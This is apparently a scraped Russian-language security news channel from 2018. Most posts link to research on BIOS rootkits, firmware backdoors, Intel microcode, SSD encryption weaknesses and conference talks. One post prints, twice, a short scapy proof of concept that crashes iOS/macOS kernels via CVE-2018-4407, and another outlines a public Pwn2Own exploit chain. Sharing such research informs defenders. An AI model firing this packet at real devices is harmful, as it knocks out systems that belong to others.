Написал блогпост по теме недавно найденного BIOS руткита Lojax. Когда все вдруг стали беспокоится о драйвере RWEverything, как инструменте двойного использования с точки зрения возможностей атак на BIOS. Но ведь это просто инструмент для сбора информации о железе, и если посмотреть на любой инструмент обновления BIOS, с подписанными драйверами, там можно понаходить и куда более опасное поведение с подписью уважаемых вендров. https://medium.com/@matrosov/dangerous-update-tools-c246f7299459
Medium
What makes OS drivers dangerous for BIOS?
How BIOS update tools with their signed drivers can create security problems and make possible attacks on BIOS from OS (Win10).
Видео докладов с конференции Derbycon 2018, прошедшей на прошлой неделе, доступны онлайн https://www.irongeek.com/i.php?page=videos/derbycon8/mainlist
Irongeek
Derbycon 2018 Videos (Hacking Illustrated Series InfoSec Tutorial Videos)
Irongeek's Information Security site with tutorials, articles and other information.
Готовимся к записи нового эпизода NoiSeBit 0x21 ”Вымысел и реальность: бэкдоры в железе и прошивках” Основная идея этого выпуска разобраться насколько это реальные вектора атак и кому стоит о них беспокоится уже сегодня.
Noise Security Bit pinned «Готовимся к записи нового эпизода NoiSeBit 0x21 ”Вымысел и реальность: бэкдоры в железе и прошивках” Основная идея этого выпуска разобраться насколько это реальные вектора атак и кому стоит о них беспокоится уже сегодня.»
Обсуждаем нашумевшие новости о бэкдорах в серверах Supermicro и UEFI прошивках. У нас в гостях @nedos и @d_olex.
Подискутировали о проблемах индустрии разработки железа, возможностях внедрения бэкдоров на этапе производства железа и насколько это сложный процесс. Много интересных и важных тем затронуто в этом выпуске. И внимание интрига, теоритически бэкдор в железе может быть гораздо дешевле, чем имплант в прошивке. Слушайте подкаст целиком, если хотите знать больше! https://noisebit.podster.fm/28
Подискутировали о проблемах индустрии разработки железа, возможностях внедрения бэкдоров на этапе производства железа и насколько это сложный процесс. Много интересных и важных тем затронуто в этом выпуске. И внимание интрига, теоритически бэкдор в железе может быть гораздо дешевле, чем имплант в прошивке. Слушайте подкаст целиком, если хотите знать больше! https://noisebit.podster.fm/28
podster.fm
Noise Security Bit 0x21 (Вымысел и реальность: бэкдоры в железе и прошивках) | Noise Security Bit слушать онлайн на podster.fm
Обсуждаем нашумевшие новости о бэкдорах в серверах Supermicro и UEFI прошивках. У нас в гостях @nedos и @d_olex.
Подискутировали о проблемах индустрии разработки железа, возможностях внедрения бэкдоров на этапе производства железа и насколько это сложный…
Подискутировали о проблемах индустрии разработки железа, возможностях внедрения бэкдоров на этапе производства железа и насколько это сложный…
Noise Security Bit pinned «Обсуждаем нашумевшие новости о бэкдорах в серверах Supermicro и UEFI прошивках. У нас в гостях @nedos и @d_olex. Подискутировали о проблемах индустрии разработки железа, возможностях внедрения бэкдоров на этапе производства железа и насколько это сложный…»
Микрокод (абстрактый слой микроархитектуры) процессоров Intel является одним из самых закрытых компонентов современных микропроцессоров. Немного пролили свет на его внутреннее устройство исследователи из университета Ruhr-Universität Bochum в своем исследовании "An Exploratory Analysis of Microcodeas a Building Block for System Defenses".
https://www.syssec.rub.de/media/emma/veroeffentlichungen/2018/08/20/constructive_ucode-CCS18.pdf
https://github.com/RUB-SysSec/Microcode
https://www.syssec.rub.de/media/emma/veroeffentlichungen/2018/08/20/constructive_ucode-CCS18.pdf
https://github.com/RUB-SysSec/Microcode
GitHub
GitHub - RUB-SysSec/Microcode: Microcode Updates for the USENIX 2017 paper: Reverse Engineering x86 Processor Microcode
Microcode Updates for the USENIX 2017 paper: Reverse Engineering x86 Processor Microcode - RUB-SysSec/Microcode
Выложили в общий доступ видео всех докладов основного трека конферении DEF CON 26 https://www.youtube.com/playlist?list=PL9fPq3eQfaaD0cf5c7wkzMoj2kifzGO4U
YouTube
DEF CON 26
Enjoy the videos and music you love, upload original content, and share it all with friends, family, and the world on YouTube.
Зарелизили видео докладов с конференции BlueHat, которая прошла в прошлом месяце https://www.youtube.com/playlist?list=PLXkmvDo4MfuugCoJZaNhWZjgEXeXZgaQR
Apple выложила небольшую статью с подробностями о чипе T2, который сейчас является основных корнем доверия в системе. T2 сильно усложняет атаки на Secure Boot, шифрование FileVault и Secure Enclave (SEP) сопроцессор. Я бы сказал, что на данный момент с точки зрения безопасности прошивки на новых платформах, Apple сильно впереди других вендоров железа https://www.apple.com/mac/docs/Apple_T2_Security_Chip_Overview.pdf
Phrack один из старейших ezine изданий, который зарелизил первый выпуск аж в 1985 году. Здорово, что до сих пор авторитет и качество публикаций этого электронного издания на высоте. Вот и сегодня на сайте phrack опубликована новая статья ”Viewer Discretion Advised: (De)coding an iOS Kernel Vulnerability” на которую стоит обратить внимание http://www.phrack.org/papers/viewer_discretion_advised.html
Хорошая книга "Mathematics of Public Key Cryptography" по основам крипторафии с открытым ключем доступна в общем доступе по желанию автора https://www.math.auckland.ac.nz/~sgal018/crypto-book/crypto-book.html
Интересное видео доклада «Effective Memory Safety Mitigations» от Криса Рольфа https://www.youtube.com/watch?v=Q379iWqmodM
YouTube
Qualcomm 2018 Security Summit
Effective memory safety mitigations - Chris Rohlf, Square. Memory Safety mitigations are an important tool for reducing attack reliability and raising exploit development costs. We have all invested a great deal of time and effort into tools, libraries, sandboxes…
iOS 12 / OS X Remote Kernel Heap Overflow (CVE-2018-4407) POC в несколько строк:
pip install scapy
sudo scapy
send(IP(dst=“Target IP“,options=[IPOption(“A”*8)])/TCP(dport=2323,options=[(19, “1"*18),(19, “2”*18)]))
pip install scapy
sudo scapy
send(IP(dst=“Target IP“,options=[IPOption(“A”*8)])/TCP(dport=2323,options=[(19, “1"*18),(19, “2”*18)]))
Любопытный доклад "Smartphone Privacy: How Your Smartphone Tracks Your Entire Life" на тему смартфонов и прайваси. В современном мире пользователь все чаще сам становится продуктом для корпораций, а точнее источником данных. Прежде чем подключаться к очередному бесплатному сервису задумайтесь, что движет компанией, которая его производит? Бесплатного ничего в этом мире нет и компаний альтруистов не существует даже в благотворительности! https://conference.hitb.org/hitbsecconf2018pek/materials/D2T2%20-%20How%20Your%20Smartphone%20Tracks%20Your%20Entire%20Life%20-%20Vladimir%20Katalov.pdf
Интересные новости сегодня вокруг безопасности жестких дисков и технологий полно дискового шифрования. В исследовании "Self-encrypting deception: weaknesses in the encryption of solid state drives (SSDs)" обсуждается технология TCG Opal, которую по большей части разработал Intel и внедрил в качестве "безопасного" прокси-интерфейса во всех современных прошивках BIOS. Так вот, к примеру MS Win10 и технология Bitlocker не использует дополнительного шифрования на современных SSD, а только интегрируется со встроенной TCG Opal, что при указанных в исследовании уязвимостях создает возможность для атаки на пароль доступа к жесткому диску. Так же в исследовании говорится о уязвимостях непосредственно в прошивках SSD дисков от Crucial и Samsung, которые при наличие физического доступа позволяют при помощи отладочных интерфейсов успешно обойти часть проверок безопасности. Эти новости все больше наводят на мысли о том, что разработчик ОС должен контролировать полностью и железо, так как без этого всегда найдется уязвимое звено именно там.
https://www.ru.nl/publish/pages/909275/draft-paper_1.pdf
https://link.medium.com/ELPjoikaCR
https://www.theregister.co.uk/2018/11/05/busted_ssd_encryption/
https://www.ru.nl/publish/pages/909275/draft-paper_1.pdf
https://link.medium.com/ELPjoikaCR
https://www.theregister.co.uk/2018/11/05/busted_ssd_encryption/
Forwarded from Хакер — Xakep.RU
Пятнадцатая встреча DEFCON Moscow состоится 10 и 11 ноября. Приходи!
15-я встреча DEFCON Moscow пройдет 10 ноября в конгресс-центре МТУСИ с основным треком в главном зале на 30–40 минут и залом поменьше, обозначенным как «давай сделаем это по-быстрому» на 15–20 минут :). Приходи, будет интересно, проведи выходной в сообществе с пользой для головы и рук. Вход бесплатный!
https://xakep.ru/2018/11/07/dc7499/
15-я встреча DEFCON Moscow пройдет 10 ноября в конгресс-центре МТУСИ с основным треком в главном зале на 30–40 минут и залом поменьше, обозначенным как «давай сделаем это по-быстрому» на 15–20 минут :). Приходи, будет интересно, проведи выходной в сообществе с пользой для головы и рук. Вход бесплатный!
https://xakep.ru/2018/11/07/dc7499/
Forwarded from ZeroNights
🔥НОВОСТЬ-ОГОНЬ🔥Финальная программа ZeroNights 2018 — для вас!
Покупайте билеты, берите друзей и приезжайте 20 ноября в самый красивый город России — Санкт-Петербург!
Обещаем хардовые доклады, крутую вечеринку и бесконечный нетворкинг. А еще кикер.
До встречи: https://2018.zeronights.ru/program/.
Покупайте билеты, берите друзей и приезжайте 20 ноября в самый красивый город России — Санкт-Петербург!
Обещаем хардовые доклады, крутую вечеринку и бесконечный нетворкинг. А еще кикер.
До встречи: https://2018.zeronights.ru/program/.
Сегодня Samuel Groß зарелизил свою зксплойт связку (Safari + macOS), которую он использовал для победы в конкурсе Pwn2Own 2018 в начале этого года. Отличное пошаговое описание и код для всей цепочки эксплойтов.
stage0: WebKit exploit
stage1: first stage payload
stage2: payload sandbox escape
stage3: coordinate the remaining stages
stage4: LPE to gain root
stage5: LPE to gain kernel code execution
https://github.com/saelo/pwn2own2018
stage0: WebKit exploit
stage1: first stage payload
stage2: payload sandbox escape
stage3: coordinate the remaining stages
stage4: LPE to gain root
stage5: LPE to gain kernel code execution
https://github.com/saelo/pwn2own2018
GitHub
GitHub - saelo/pwn2own2018: A Pwn2Own exploit chain
A Pwn2Own exploit chain. Contribute to saelo/pwn2own2018 development by creating an account on GitHub.